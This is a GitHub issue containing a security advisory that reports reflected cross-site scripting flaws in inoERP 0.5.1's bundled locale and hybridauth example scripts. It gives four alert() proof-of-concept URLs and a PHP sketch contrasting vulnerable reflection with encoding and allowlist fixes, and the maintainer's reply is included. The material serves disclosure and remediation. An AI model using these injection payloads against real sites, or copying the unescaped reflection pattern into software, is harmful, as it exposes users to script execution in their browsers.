inoerp / inoERP

inoERP is an OneApp [ Go back-end & Flutter front-end ] based enterprise management system
http://docs.inoerp.com/
Mozilla Public License 2.0

inoerp – Multiple Cross-Site Scripting (XSS) #71

Closed bestshow closed 7 years ago

bestshow commented 7 years ago

Product: inoerp
Download: https://github.com/inoerp/inoERP
Vulnerable Version: 0.5.1 and probably prior
Tested Version: 0.5.1
Author: ADLab of Venustech

Advisory Details: Multiple Cross-Site Scripting (XSS) vulnerabilities were discovered in "inoerp 0.5.1", which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user-supplied data in multiple HTTP GET parameters passed to several URLs. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the "alert()" JavaScript function to show a pop-up message box:

PoC:

(1) http://localhost/.../inoERP-master/inoerp/locale/examples/pigs_dropin.php?lang=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22

(2) http://localhost/.../inoERP-master/inoerp/locale/examples/pigs_fallback.php?lang=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22

(3) http://localhost/.../inoERP-master/inoerp/tparty/extensions/social_login/hybridauth/examples/social_hub/includes/menu.php?provider=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22

(4) http://localhost/.../inoERP-master/inoerp/tparty/extensions/social_login/hybridauth_old/examples/social_hub/includes/menu.php?provider=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
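
As an added illustration (not code from inoERP or from the bundled locale/hybridauth example scripts, whose actual source is not shown in this issue), the reflection pattern the advisory describes next to two defensive fixes. The attribute context, the locale list and the function names are assumptions.

```php
<?php
// Added illustration, not the contents of the files named in the advisory.
// Assumed context: the 'lang' or 'provider' GET value is echoed inside a
// double-quoted HTML attribute, which is why a payload beginning with ">
// can close the attribute and tag and start a <script> element.

// Vulnerable pattern: raw reflection of user input into markup.
function render_vulnerable(string $lang): string
{
    return '<a href="?lang=' . $lang . '">' . $lang . '</a>';
}

// Fix 1: contextual output encoding. ENT_QUOTES encodes both quote kinds,
// so the value can no longer terminate the attribute it is placed in.
function render_encoded(string $lang): string
{
    $safe = htmlspecialchars($lang, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="?lang=' . $safe . '">' . $safe . '</a>';
}

// Fix 2: allowlist. A locale code (or a social-login provider name) comes
// from a known, finite set, so anything else is rejected before it ever
// reaches the output layer. Encoding is still applied on output.
function select_lang(?string $requested, array $allowed, string $default): string
{
    return ($requested !== null && in_array($requested, $allowed, true))
        ? $requested
        : $default;
}

// Constructed demo input with the same shape as the advisory's payload.
$payload = '"><script>alert(1);</script><"';
$allowed = ['en_US', 'de_DE', 'fr_FR'];   // assumed locale set

echo render_vulnerable($payload), PHP_EOL;  // <script> survives intact
echo render_encoded($payload), PHP_EOL;     // &quot;&gt;&lt;script&gt;...
echo render_encoded(select_lang($payload, $allowed, 'en_US')), PHP_EOL; // en_US
```

Since the affected scripts are example files shipped with third-party bundles rather than application code, the simplest mitigation is not to deploy those example directories on a production web root at all.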

inoerp commented 7 years ago

Hi bestshow,

All the products you have mentioned (locale/hybridauth) are third-party applications and not developed by inoERP. You don't need to use any third-party application to use inoERP. You can just remove them from your application.